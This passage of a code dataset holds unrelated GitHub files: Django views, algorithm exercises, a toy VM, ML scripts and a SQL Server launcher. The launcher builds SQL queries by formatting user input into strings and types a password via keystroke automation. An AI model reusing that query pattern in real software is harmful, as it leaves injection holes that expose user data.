FormularioRegistroPlatos()\n\n #creamos un diccionario para enviar datos hacia al template \n diccionarioEnvioDatos ={\n 'formulario':formulario\n }\n\n #RECIBIENDO DATOS DEL FORMULARIO \n #PETICION POST \n if request.method == 'POST':\n datosFormulario = FormularioRegistroPlatos(request.POST)\n \n if datosFormulario.is_valid():\n datosLimpios = datosFormulario.cleaned_data\n #Enviando datos a la DB\n platoNuevo=Platos(\n nombre= datosLimpios[\"nombrePlato\"], \n descripcion=datosLimpios[\"descripcionPlato\"], \n imagen=datosLimpios[\"fotoPlato\"], \n precio=datosLimpios[\"precioPlato\"],\n categoria=datosLimpios[\"tipoPlato\"]\n )\n platoNuevo.save()\n \n\n return render(request, 'platos.html', diccionarioEnvioDatos)\n\ndef EmpleadosVista(request):\n\n formularioEmpleados = FormularioRegistroEmpleados()\n\n diccionarioEnvioDatosEmpleados={\n 'formEmpleados': 
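pages.py above re-downloads each JSON file only when the local copy is missing or more than a day old; note its top-level check reads the mtime before testing existence, which raises on a first run. A hedged helper doing the same age check safely, with the existence test first (URL and path are placeholders):

```python
# Download a file only when missing or older than max_age_s.
import os
import time
import urllib.request

def fetch_if_stale(url, path, max_age_s=86400):
    fresh = (os.path.exists(path)
             and time.time() - os.path.getmtime(path) <= max_age_s)
    if not fresh:
        urllib.request.urlretrieve(url, path)
    return path
```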
formularioEmpleados\n }\n\n if request.method == 'POST':\n datosFormulario = FormularioRegistroEmpleados(request.POST)\n \n if datosFormulario.is_valid():\n datosLimpios = datosFormulario.cleaned_data\n empleadoNuevo= Empleados(\n nombre= datosLimpios[\"nombreEmpleado\"],\n apellido=datosLimpios[\"apellidoEmpleado\"], \n telefono=datosLimpios[\"telefonoEmpleado\"], \n cargo=datosLimpios[\"cargoEmpleado\"]\n )\n empleadoNuevo.save()\n\n return render(request, 'empleados.html', diccionarioEnvioDatosEmpleados)\n","repo_name":"NataliaVera/Restaurante---Python-Django","sub_path":"config/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9377101515","text":"\"\"\"\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which a^2 + b^2 = c^2.\n\nFor example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.\n\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000.\n\nFind the product abc.\n\"\"\"\n\ndef main():\n \"\"\"\n >>> main()\n 31875000\n \"\"\"\n for a in range(1, 1000 // 3):\n for b in range(a, (1000 - a) // 2):\n c = 1000 - a - b\n if a**2 + b**2 == c**2:\n return a * b * c\n\n\nif __name__ == '__main__':\n import doctest; doctest.testmod(verbose=True)\n\n","repo_name":"neilmarshall/Project_Euler","sub_path":"009/PE_9.py","file_name":"PE_9.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42957651887","text":"import logging\n\nclass InvalidBytecodeError(Exception):\n def __init__(self, bytecode):\n self.bytecode = bytecode\n\n def __str__(self):\n return repr(self.bytecode)\n\n\nclass Bytecode(object):\n \"\"\" A bytecode in our simple virtual machine.\"\"\"\n opcodes = {}\n\n def __init__(self, name, opcode, operand_count=0):\n self.name = name\n self.opcode = opcode\n self.operand_count = operand_count\n self.logger = logging.getLogger(__name__)\n Bytecode.opcodes[self.opcode] = self\n\n def __str__(self):\n return \"Bytecode name: {}\\topcode: {:02d}\\toperand_count: {:02d}\".format(\n self.name.ljust(10), self.opcode, self.operand_count)\n\n def dump_bytecode(self):\n return \"{} ({})\".format(self.name, self.operand_count)\n\n @classmethod\n def to_instruction_from_opcode(cls, opcode):\n return cls.opcodes[opcode]\n\n\nINVALID = Bytecode(\"INVALID\", 0)\nIADD = Bytecode(\"IADD\", 1)\nISUB = Bytecode(\"ISUB\", 2)\nIMUL = Bytecode(\"IMUL\", 3)\nIEQ = Bytecode(\"IEQ\", 5)\nILT = Bytecode(\"ILT\", 4)\nBR = Bytecode(\"BR\", 6, 1)\nBRT = Bytecode(\"BRT\", 7, 1)\nBRF = Bytecode(\"BRF\", 8, 1)\nICONST = Bytecode(\"ICONST\", 9, 1)\nLOAD = Bytecode(\"LOAD\", 10, 1)\nGLOAD = Bytecode(\"GLOAD\", 11, 1)\nSTORE = Bytecode(\"STORE\", 12, 1)\nGSTORE = Bytecode(\"GSTORE\", 13, 1)\nPUTS = Bytecode(\"PUTS\", 14)\nPOP = Bytecode(\"POP\", 15, 1)\nCALL = Bytecode(\"CALL\", 16, 2)\nRET = Bytecode(\"RET\", 17)\nHALT = Bytecode(\"HALT\", 18)\n","repo_name":"skk/simple_virtual_machine","sub_path":"src/simple-virtual-machine/simplevirtualmachine/bytecodes.py","file_name":"bytecodes.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13985878445","text":"# https://www.acmicpc.net/problem/14653\nimport sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\nN, K, Q = map(int, input().split())\n\nname = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 
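Each Bytecode instance in bytecodes.py above registers itself in the class-level opcodes dict as a side effect of __init__, so a raw opcode read from a program can be mapped back to its instruction and operand count during decoding. A usage sketch, assuming the module imports as bytecodes:

```python
# Decode raw opcodes via the registry populated at import time.
from bytecodes import Bytecode, ICONST, HALT  # assumed module name

instr = Bytecode.to_instruction_from_opcode(9)          # opcode 9 -> ICONST
print(instr.dump_bytecode())                            # "ICONST (1)"
print(Bytecode.to_instruction_from_opcode(18) is HALT)  # True: HALT is 18
```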
'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\nname = name[:N]\nname.remove('A')\nmessages = [list(map(str, input().split())) for _ in range(K)]\n\nif int(messages[Q-1][0]) == 0:\n print(-1)\nelse:\n for message in messages:\n if int(message[0]) >= int(messages[Q-1][0]):\n if message[1] in name:\n name.remove(message[1])\n\n print(*name)","repo_name":"WChan1027/Problem","sub_path":"Baekjoon/Silver/14653. 너의 이름은.py","file_name":"14653. 너의 이름은.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26148630059","text":"#300. Longest Increasing Subsequence\ndef lengthOfLIS(self, nums: List[int]) -> int:\n if not nums or len(nums) == 0: return 0\n \n dp = [1] * len(nums)\n \n for i in range(len(nums)-1, -1, -1):\n for j in range(i+1, len(nums), 1):\n if nums[i] < nums[j]:\n dp[i] = max(dp[i],1+dp[j])\n \n return max(dp)\n \n#673. Number of Longest Increasing Subsequence\ndef findNumberOfLIS(self, nums: List[int]) -> int:\n length = [1] * len(nums) # length store longest ending at nums[i]\n count = [1] * len(nums) # count store the number of longest at nums[i]\n \n for i in range(len(nums)):\n for j in range(0, i, 1):\n if nums[j] < nums[i]:\n if length[i] < length[j] + 1:\n # update because find longer one\n length[i] = length[j] + 1\n # update count\n count[i] = count[j]\n elif length[i] == length[j] + 1:\n # another same result\n # print(length[i], \" \", length[j]+1)\n count[i] += count[j]\n maxlen = max(length)\n print(length)\n print(count)\n return sum([count[i] for i in range(len(nums)) if maxlen == length[i]]) # consider[2,2,2,2,2] => 5\n ","repo_name":"yuchangrachel/algorithm","sub_path":"needorganize/dp/subsequence/300.673. Longest Increasing Subsequence.py","file_name":"300.673. Longest Increasing Subsequence.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12400327951","text":"import os\n\nfrom dotenv import load_dotenv\n\nfrom models.buildings_generator import BuildingsGenerator\n\nload_dotenv(os.path.join(os.getcwd(), '.env'))\n\nif __name__ == '__main__':\n generator = BuildingsGenerator(\n -26.26,\n -12.24,\n 62.48,\n 67.25,\n os.environ['S3_BUCKET'],\n 'iceland'\n )\n buildings = generator.generate()\n with open('output/iceland_buildings.geojson', 'w') as file_:\n file_.write(buildings)","repo_name":"mariamrf/athena-buildings","sub_path":"get_buildings.py","file_name":"get_buildings.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"22923430347","text":"import solara\n\n# Declare reactive variables at the top level. 
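The lengthOfLIS method above fills dp right to left, with dp[i] the length of the longest increasing subsequence starting at index i. The same O(n^2) recurrence as a standalone function with a quick check:

```python
# dp[i] = 1 + max(dp[j]) over j > i with nums[i] < nums[j].
from typing import List

def length_of_lis(nums: List[int]) -> int:
    if not nums:
        return 0
    dp = [1] * len(nums)
    for i in range(len(nums) - 1, -1, -1):
        for j in range(i + 1, len(nums)):
            if nums[i] < nums[j]:
                dp[i] = max(dp[i], 1 + dp[j])
    return max(dp)

assert length_of_lis([10, 9, 2, 5, 3, 7, 101, 18]) == 4  # 2, 3, 7, 101
```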
Components using these variables\n# will be re-executed when their values change.\nsentence = solara.reactive(\"Solara makes our team more productive.\")\nword_limit = solara.reactive(10)\n\n\n# in case you want to override the default order of the tabs\nroute_order = [\"/\", \"settings\", \"chat\", \"clickbutton\"]\n\n@solara.component\ndef Page():\n with solara.Column(style={\"padding-top\": \"30px\"}):\n solara.Title(\"Solarathon example project\")\n # Calculate word_count within the component to ensure re-execution when reactive variables change.\n word_count = len(sentence.value.split())\n\n solara.SliderInt(\"Word limit\", value=word_limit, min=2, max=20)\n solara.InputText(label=\"Your sentence\", value=sentence, continuous_update=True)\n\n # Display messages based on the current word count and word limit.\n if word_count >= int(word_limit.value):\n solara.Error(f\"With {word_count} words, you passed the word limit of {word_limit.value}.\")\n elif word_count >= int(0.8 * word_limit.value):\n solara.Warning(f\"With {word_count} words, you are close to the word limit of {word_limit.value}.\")\n else:\n solara.Success(\"Great short writing!\")\n\n solara.Markdown(\"*First exercise*: remove this text and write your own sentence.\")\n\n\n@solara.component\ndef Layout(children):\n # this is the default layout, but you can override it here, for instance some extra padding\n return solara.AppLayout(children=children, style={\"padding\": \"20px\"})\n","repo_name":"widgetti/solarathon","sub_path":"solarathon/pages/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"40641750255","text":"import curses\r\nimport os\r\nimport sys\r\n\r\nimport globals as g\r\nimport input\r\nimport render\r\nimport util\r\nfrom lib_ext.bindings import livesplit_core as lsc\r\n\r\n\r\ndef init_lcs():\r\n # g.run init\r\n try:\r\n frun = open(g.settings['files']['run'], \"rb\")\r\n except FileNotFoundError:\r\n util.abort_error(\"run file \" + g.settings['files']['run'] + \" does not exist\")\r\n # noinspection PyUnboundLocalVariable\r\n prun = lsc.Run.parse(*util.data_len_for_file(frun), g.settings['files']['runsave'], False)\r\n if not prun.parsed_successfully():\r\n util.abort_error(\"parsing run \" + g.settings['files']['run'] + \" failed.\")\r\n run = prun.unwrap()\r\n if not run:\r\n util.abort_error(\"run intialization failed\")\r\n\r\n # g.timer init\r\n g.timer = lsc.Timer.new(run)\r\n if not g.timer:\r\n util.abort_error(\"timer intialization failed\")\r\n\r\n # g.layout init\r\n try:\r\n flayout = open(g.settings['files']['layout'], \"rb\")\r\n except FileNotFoundError:\r\n util.abort_error(\"layout file \" + g.settings['files']['layout'] + \" does not exist\")\r\n # noinspection PyUnboundLocalVariable\r\n ext = os.path.splitext(flayout.name)[1]\r\n # noinspection PyBroadException\r\n try:\r\n if ext == \".lsl\":\r\n g.layout = lsc.Layout.parse_original_livesplit(*util.data_len_for_file(flayout))\r\n if ext == \".json\" or ext == \".ls1l\":\r\n g.layout = lsc.Layout.parse_json(flayout.read())\r\n if not g.layout:\r\n raise ValueError\r\n except:\r\n util.abort_error(\"parsing layout \" + g.settings['files']['layout'] + \" failed.\")\r\n\r\n\r\ndef init_settings():\r\n # g.settings init\r\n # noinspection PyBroadException\r\n try:\r\n g.settings = util.readsettings(\"res/settings.json\")\r\n\r\n if len(sys.argv) > 1:\r\n g.settings['files']['run'] = sys.argv[1]\r\n 
elif 'run' not in g.settings['files']:\r\n g.settings['files']['run'] = \"res/splits.lss\"\r\n # empty runsave path? use run path\r\n if not g.settings['files']['runsave']:\r\n g.settings['files']['runsave'] = g.settings['files']['run']\r\n\r\n if len(sys.argv) > 2:\r\n g.settings['files']['layout'] = sys.argv[2]\r\n elif 'layout' not in g.settings['files']:\r\n g.settings['files']['layout'] = \"res/layout.json\"\r\n\r\n if 'startsplit' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['startsplit'] = 'space'\r\n if 'reset' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['reset'] = '-'\r\n if 'undosplit' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['undosplit'] = '0'\r\n if 'skipsplit' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['skipsplit'] = '+'\r\n if 'pause' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['pause'] = 'enter'\r\n if 'previouscomparison' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['previouscomparison'] = '7'\r\n if 'nextcomparison' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['nextcomparison'] = '9'\r\n if 'toggleenable' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['toggleenable'] = '/'\r\n except:\r\n util.abort_error(\"settings intialization failed\")\r\n\r\n\r\ndef main():\r\n init_settings()\r\n init_lcs()\r\n input.init()\r\n curses.wrapper(render.init)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"peb-adr/TermSplit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74265031480","text":"# Lab 04 - Flow control: if, elif and else\n# Author: Tanja Juric\n\nx = int (input (\"Please enter a number: \"))\n\nif (x % 2) == 0:\n print (x, \"is even.\")\nelse: \n print (x, \"is odd.\")\n\n","repo_name":"Tanja888/PS","sub_path":"week04/isEven.py","file_name":"isEven.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31763870554","text":"\"\"\"\nFile: pencil_sketch.py\n----------------\nNot part of the assignment. This was a lecture demo!\nThis is a fun algorithm to implement. 
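The hotkey defaults in TermSplit's init_settings above repeat the same "if key not in ..." guard per key; dict.setdefault collapses that to one line per key with identical behaviour, since it assigns only when the key is absent:

```python
# Same default-filling behaviour as the hotkey guards above.
hotkeys = {"reset": "r"}              # pretend this came from settings.json
defaults = {"startsplit": "space", "reset": "-", "undosplit": "0",
            "skipsplit": "+", "pause": "enter"}
for key, value in defaults.items():
    hotkeys.setdefault(key, value)

print(hotkeys["reset"])   # 'r'     - an existing value is never overwritten
print(hotkeys["pause"])   # 'enter' - a missing key gets the default
```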
It is not in the\nassignment, but feel free to implement it as an extension.\nPut the smaller foreground picture into the background.\nDo not include any pixels that are sufficiently blue.\n\"\"\"\n\nfrom simpleimage import SimpleImage\n\nINTENSITY_THRESHOLD = 1.8\n\n\ndef main():\n foreground = SimpleImage('images/tiefighter.jpg')\n background = SimpleImage('images/quad.jpg')\n bluescreen(foreground, background)\n background.show()\n\n\ndef bluescreen(foreground, background):\n for pixel in foreground:\n avg_pixel = (pixel.red + pixel.green + pixel.blue) / 3\n if pixel.blue <= (avg_pixel * INTENSITY_THRESHOLD):\n x = pixel.x\n y = pixel.y\n background.set_pixel(x, y, pixel)\n\n\nif __name__ == '__main__':\n main()","repo_name":"vsingh1998/Code_in_place","sub_path":"Assignments/3/Assignment3/blue_screen.py","file_name":"blue_screen.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24525306673","text":"import numpy as np\nimport random\nimport pandas as pd\nimport sys\nimport os\nimport time\nimport codecs\nimport collections\nimport numpy\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.utils import np_utils\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nimport scipy\nfrom scipy import spatial\nfrom nltk.tokenize.toktok import ToktokTokenizer\nimport re\nfrom collections.abc import Iterable\n# leemos un dataset\nfile_content = pd.read_csv('spam.csv', encoding = \"ISO-8859-1\")\nEmail_Data = file_content[[ 'text']]\nlist_data = Email_Data.values.tolist()\n#print(list_data)# DATOS\ndef flatten(items):\n \"\"\"Yield items from any nested iterable\"\"\"\n for x in items:\n if isinstance(x, Iterable) and not isinstance(x, (str, bytes)):\n for sub_x in flatten(x):\n yield sub_x\n else:\n yield x\n#convierto la lista en STRINGS\nTextData=list(flatten(list_data))\ntexto =''\nfor i in TextData:\n texto +=i[0]\n\nTextData =texto\n#preprocesamos el texto sacandole por ej lineas nuevas, convirtiendo en minusculas entre otras...\nTextData = TextData.replace('\\n','')\nTextData = TextData.lower()\npattern = r'[^a-zA-z0-9\\s]'\nTextData = re.sub(pattern, '', ''.join(TextData))\n#realizamos la tokenizacion\ntokenizer = ToktokTokenizer()\ntokens = tokenizer.tokenize(TextData)\ntokens = [token.strip() for token in tokens]\n#obtenemos las palabritas y las ordenamos\nword_counts = collections.Counter(tokens)\nword_c = len(word_counts)\nprint(word_c)\ndistinct_words = [x[0] for x in word_counts.most_common()]\ndistinct_words_sorted = list(sorted(distinct_words))\n#generamos un indice para todas las palabritas\nword_index = {x: i for i, x in enumerate(distinct_words_sorted)}\n#largo de la ORACION\nsentence_length = 25\n#preparammos los datos para el modelo\n#vamos a generar secuencias de palabras\n#input = oraciones de entrada con indice\n#output = oraciones de salida con indice\nInputData = []\nOutputData = []\nfor i in range(0, word_c - sentence_length, 1):\n X = tokens[i:i + sentence_length]\n Y = tokens[i + sentence_length]\n InputData.append([word_index[char] for char in X])\n OutputData.append(word_index[Y])\nprint (InputData[:1])\nprint (\"\\n\")\nprint(OutputData[:1])\n#generamos X\nX = numpy.reshape(InputData, (len(InputData), sentence_length, 1))\n#hacemos el one hot encode de la variable de salida\n# One hot encode the output variable\nY = 
np_utils.to_categorical(OutputData)\n#Vamos a definir el modelos LSTM con 256 unidades de memoria\n#definimos el modelo:\nmodel = Sequential()\nmodel.add(LSTM(256, input_shape=(X.shape[1], X.shape[2])))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(Y.shape[1], activation='softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\n#definimos un 'checkpoint'\nfile_name_path=\"weights-improvement-{epoch:02d}-{loss:.4f}.hdf5\"\ncheckpoint = ModelCheckpoint(file_name_path, monitor='loss', \nverbose=1, save_best_only=True, mode='min')\ncallbacks = [checkpoint]\n#VARIABLES\nEPOCH = 5\nBATCH_SIZE = 128\n#entrenamos el modelo\nmodel.fit(X, Y, epochs=EPOCH, batch_size=BATCH_SIZE, callbacks=callbacks)\n#esto nos genero unos archivitos que los vamos a cargar para usar. Estos son los weights de la red neuronal\n#va a tirar error la primera vez que se ejecute, pq no va a encontrar el archivo despues anda bien\nfile_name = \"weights-improvement-05-7.2197.hdf5\"\nmodel.load_weights(file_name)\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\n###############PRUEBA####################\n#genero secuencias random\nstart = numpy.random.randint(0, len(InputData))\ninput_sent = InputData[start]\n#generamos el indice de la siguiente palabrita del mail (Lo que vamos a predecir)\nX = numpy.reshape(input_sent, (1, len(input_sent), 1))\npredict_word = model.predict(X, verbose=0)\nindex = numpy.argmax(predict_word)\nprint(input_sent)\nprint (\"\\n\")\nprint(index)\n#traducimos la salida\nword_index_rev = dict((i, c) for i, c in enumerate(tokens))\nresult = word_index_rev[index]\nsent_in = [word_index_rev[value] for value in input_sent]\nprint(sent_in)\nprint (\"\\n\")\nprint(result)\n","repo_name":"Luminicen/NLP-Lanto","sub_path":"predicting_the_next_word.py","file_name":"predicting_the_next_word.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"194885980","text":"#!/usr/env/python3\n## Provide robust information for a QM PDB (created using mda-qm-part1.py)\n\nimport pandas as pd\n\n## Read in the space-delimited BASIS_verification file\ndf = pd.read_csv('BASIS_verification.txt', sep=r'\\s{1,}', engine='python', \\\n header=0)\n\n## Remove the PB rows\ndf = df[df.Type != 'PB']\n\n## Reindex, then force index to start at '1' instead of '0'\ndf = df.reset_index()\ndf.index += 1\n\n## Add a column with the new QM PDB indexing\ndf['QM_PDB'] = df.index\n\n## Write a new file with the QM_PDB_ID indexing\nwith open(\"PDB_verification.txt\", \"w+\") as bv_out:\n bv_out.write(\"QM_PDB_ID AtomName ResName ResNum Regions_ID TINKER_ID BASIS_ID Type\\n\")\n for r in df.itertuples(index=True, name='Pandas'):\n bv_out.write(\"{:<9} {:<8} {:<7} {:<6} {:<10} {:<9} {:<8} {:<5}\\n\".format(\\\n r.QM_PDB, r.AtomName, r.ResName, r.ResNum, r.Regions_ID, r.TINKER_ID,\\\n r.BASIS_ID, r.Type))\n bv_out.close()\n","repo_name":"emleddin/research-scripts","sub_path":"LICHEM-tools/qm-pdb-map.py","file_name":"qm-pdb-map.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"25966396157","text":"\"\"\"Init file for CHESS users\"\"\"\n\nfrom importlib import reload\n\nimport multiprocessing\nimport numpy as np\n\nfrom hexrd.imageseries import stats\nfrom hexrd.imageseries.process import ProcessedImageSeries\nfrom hexrd import imageseries\n\nimport chess\n\n# chess.darkframes_dflt = 10 # testing\n\nncpus = 
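predicting_the_next_word.py above trains a word-level LSTM on windows of 25 word indices (one feature per timestep) with a softmax over the vocabulary. A minimal sketch of the same model wiring with the older Keras API the record uses; the batch, vocabulary size, and window length here are illustrative:

```python
# Window-of-indices -> LSTM(256) -> softmax over vocabulary.
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout, LSTM
from keras.utils import np_utils

sentence_length, vocab = 25, 500
X = np.random.randint(vocab, size=(64, sentence_length, 1))
Y = np_utils.to_categorical(np.random.randint(vocab, size=64),
                            num_classes=vocab)

model = Sequential()
model.add(LSTM(256, input_shape=(X.shape[1], X.shape[2])))
model.add(Dropout(0.2))
model.add(Dense(Y.shape[1], activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="adam")
model.fit(X, Y, epochs=1, batch_size=32)
```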
int(np.round(0.5*multiprocessing.cpu_count()))\nnrows = 3888\nncols = 3072\nrectangles = {\n '0_0': np.array([[0, nrows//2], [0, ncols//2]]),\n '1_0': np.array([[nrows//2, nrows], [0, ncols//2]]),\n '0_1': np.array([[0, nrows//2], [ncols//2, ncols]]),\n '1_1': np.array([[nrows//2, nrows], [ncols//2, ncols]])\n}\n\ncycle = '2021-1'\nstation = 'id3a'\nuser = 'pagan-1108-2'\n\n\n'''\nsample_info = {\n 'fd1-q-1' :np.arange(12, 68),\n 'fd1-a-1':np.arange(4, 98),\n 'fd2-q-1':np.hstack([2, np.arange(10, 87)]),\n 'fd2-a-1':np.hstack([3, np.arange(11, 25), np.arange(26, 40), np.arange(54, 79)])\n}\n\nsample_info = {\n 'mruby-0129':[4, ]\n}\n'''\n\nsample_info = {\n 'mruby-0120a':np.arange(1,2)\n}\n\ndo_subpanels = False\n\nsave_fmt = 'frame-cache'\n\nims_options_dict = dict(\n ff1=chess.ImageSeriesOpts(flip='v'),\n ff2=chess.ImageSeriesOpts(flip='h')\n)\n\n# %% functions\n\ndef process_raw_mp_init(params):\n global paramMP\n paramMP = params\n\n\ndef process_raw_mp(scan_id):\n threshold = paramMP['threshold']\n opts_dict = paramMP['ims_options']\n parser = paramMP['parser']\n do_subpanels = paramMP['do_subpanels']\n\n fname_tmpl = \"%s_%04d-%s.npz\"\n imsd = parser.imageseries_dict(scan_id, opts_dict)\n for panel_id, ims in imsd.items():\n if do_subpanels:\n for subpanel_id, rect in rectangles.items():\n pims = ProcessedImageSeries(\n ims,\n [('rectangle', rect), ]\n )\n output_fname = fname_tmpl % (\n parser.runinfo.name,\n scan_id,\n '_'.join([panel_id, subpanel_id])\n )\n if save_fmt == 'frame-cache':\n parser.write_fc(pims, output_fname, threshold)\n elif save_fmt == 'hdf5':\n imageseries.write(pims, output_fname, format='hdf5', path='/imageseries')\n else:\n output_fname = fname_tmpl % (\n parser.runinfo.name,\n scan_id,\n panel_id\n )\n if save_fmt == 'frame-cache':\n parser.write_fc(ims, output_fname, threshold)\n elif save_fmt == 'hdf5':\n imageseries.write(ims, output_fname, format='hdf5', path='/imageseries')\n\n# run\n\nfor sample_name, scan_ids in sample_info.items():\n runinfo = chess.RunInfo(\n cycle=cycle,\n station=station,\n user=user,\n name=sample_name\n )\n\n '''\n p = chess.Parser(runinfo)\n imf_dict = p.imagefiles_dict(scanid)\n raw_dict = p.raw_imageseries_dict(scanid)\n '''\n\n params = dict(\n threshold=250,\n ims_options=ims_options_dict,\n parser=chess.Parser(runinfo),\n do_subpanels=do_subpanels\n )\n\n # import pdb;pdb.set_trace()\n\n print(\"INFO:\\tprocessing '%s'\" % sample_name)\n pool = multiprocessing.Pool(\n min(ncpus, len(scan_ids)),\n process_raw_mp_init, (params, )\n )\n result = pool.map(process_raw_mp, scan_ids)\n pool.close()\n","repo_name":"rachelelim/HEDM_code","sub_path":"dex_distortion_2021-02-10/preprocess_dex.py","file_name":"preprocess_dex.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30577994879","text":"\"\"\"\r\nPurpose:Connect to SQL Server using Enterprise Manager with Windows Authentication\r\nDate Programmer Description\r\nJuly 20, 2018 Yury Stanev Original\r\nTODO: convert to '.exe' using 'pyinstaller -F ssms.py' on Windows\r\n\"\"\"\r\n\r\nimport sqlite3 # creates connection to the DB file\r\nfrom prettytable import from_db_cursor\r\nimport getpass\r\nimport subprocess # allows you to spawn new processes, connect to their input/output/error pipes\r\nimport time\r\nimport pyautogui\r\n\r\nconn = sqlite3.connect('users2.sqlite')\r\nc = conn.cursor() # allows to perform SQL operations\r\n\r\n\r\n# Functions\r\ndef get_app_id():\r\n # 
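preprocess_dex.py above hands its parameter dict to a Pool initializer that stores it in a module-level global, so every worker reads it once instead of re-pickling it per task. A runnable sketch of that initializer pattern:

```python
# Pool(processes, initializer, initargs): initializer runs once per worker.
import multiprocessing

def init_worker(params):
    global paramMP          # each worker process gets its own copy
    paramMP = params

def work(scan_id):
    return paramMP["threshold"] + scan_id

if __name__ == "__main__":
    with multiprocessing.Pool(2, init_worker, ({"threshold": 250},)) as pool:
        print(pool.map(work, [1, 2, 3]))   # [251, 252, 253]
```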
list all the applications\r\n c.execute(\"SELECT DISTINCT * FROM apps ORDER BY appid ASC\")\r\n table = from_db_cursor(c)\r\n print(table)\r\n\r\n app_id = input(\"Pick app code: \")\r\n while app_id == \"\":\r\n app_id = input(\"Pick app code: \")\r\n\r\n return ''.join(app_id) # ''.join() is used to convert a tuple to a string\r\n\r\n\r\ndef get_group_id(app_id):\r\n # list the group IDs associated with the application\r\n c.execute(\"SELECT DISTINCT id, name FROM groups WHERE appid = '%s'\" % app_id)\r\n table = from_db_cursor(c)\r\n print(table)\r\n\r\n group_id = input(\"Pick group ID: \")\r\n while group_id == \"\":\r\n group_id = input(\"Pick group ID: \")\r\n\r\n c.execute(\"SELECT DISTINCT name FROM groups WHERE id = '%s'\" % group_id)\r\n group_id = c.fetchone()\r\n\r\n pswd = getpass.getpass() # have to use 'terminal', default prompt: 'Password: '\r\n\r\n return ''.join(group_id), pswd\r\n\r\n\r\ndef get_instance(app_id):\r\n # list the instances associated with the application\r\n c.execute(\"SELECT DISTINCT id, name FROM instances WHERE appid = '%s'\" % app_id)\r\n table = from_db_cursor(c)\r\n print(table)\r\n\r\n instance_name = input(\"Pick instance name: \")\r\n while instance_name == \"\":\r\n instance_name = input(\"Pick instance name: \")\r\n\r\n c.execute(\"SELECT DISTINCT name FROM instances WHERE id = '%s'\" % instance_name)\r\n instance_name = c.fetchone()\r\n\r\n return ''.join(instance_name)\r\n\r\n\r\ndef pick_sql_version(instance_name):\r\n # create an easy list to pick from\r\n sql_year = ['2012', '2014', '2016']\r\n for i, val in enumerate(sql_year, start=1):\r\n print(i, \" SQL Server Management Studio \", val)\r\n\r\n sql_version = input(\"Pick the SSMS version: \")\r\n while sql_version == \"\":\r\n sql_version = input(\"Pick the SSMS version: \")\r\n\r\n # depending on the sql version path might vary\r\n version_d = {\r\n '1': '110',\r\n '2': '120',\r\n '3': '130'\r\n }\r\n\r\n # If invalid path is chosen fall back to default (120)\r\n path = '\"C:/Program Files (x86)/Microsoft SQL Server/{}/Tools/Binn/ManagementStudio/Ssms.exe -S '.format(\r\n version_d.get(sql_version, '120')) + instance_name + '\"'\r\n\r\n return path\r\n\r\n\r\ndef command_builder(path, group_id): # builds a command used to launch SSMS\r\n command = 'runas /netonly /user:' + group_id + \" \" + path\r\n return command\r\n\r\n\r\ndef start_ssms(command, pswd):\r\n subprocess.Popen(['start', '/wait', 'cmd'], shell=True)\r\n time.sleep(1)\r\n\r\n pyautogui.typewrite(command) # enters the command to start SSMS\r\n pyautogui.press('enter')\r\n pyautogui.typewrite(pswd) # enter password\r\n pyautogui.press('enter')\r\n\r\n\r\n# Functions Calls\r\ndef main():\r\n app_id = get_app_id() # stores returned value, allows values to be passed around and accessed later\r\n 